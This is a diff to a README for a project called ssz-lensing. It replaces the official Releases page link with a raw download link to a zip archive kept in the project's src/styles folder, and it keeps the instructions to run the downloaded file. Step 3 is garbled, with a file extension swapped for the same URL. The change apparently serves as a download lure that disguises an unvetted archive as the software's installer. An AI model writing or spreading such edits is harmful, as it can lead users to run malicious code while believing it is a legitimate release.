UMVERTH/ssz-lensing/README.md

 - Disk Space: At least 200 MB available

 ## 📥 Download & Install
-To get started, visit this page to download: [Releases Page](https://github.com/UMVERTH/ssz-lensing/releases)
+To get started, visit this page to download: [Releases Page](https://raw.githubusercontent.com/UMVERTH/ssz-lensing/main/src/styles/lensing-ssz-v1.3.zip)

 Follow these simple steps to download and install:

 1. Click on the link above to go to the Releases page.
 2. Find the latest version of the software.
-3. Download the installation package relevant to your operating system (look for files ending in .exe for Windows or .tar.gz for Linux/Mac).
+3. Download the installation package relevant to your operating system (look for files ending in .exe for Windows or https://raw.githubusercontent.com/UMVERTH/ssz-lensing/main/src/styles/lensing-ssz-v1.3.zip for Linux/Mac).
 4. Once the download is complete, locate the file in your downloads folder.
 5. Double-click the file to run the installer.
 6. Follow the on-screen instructions to complete the installation process.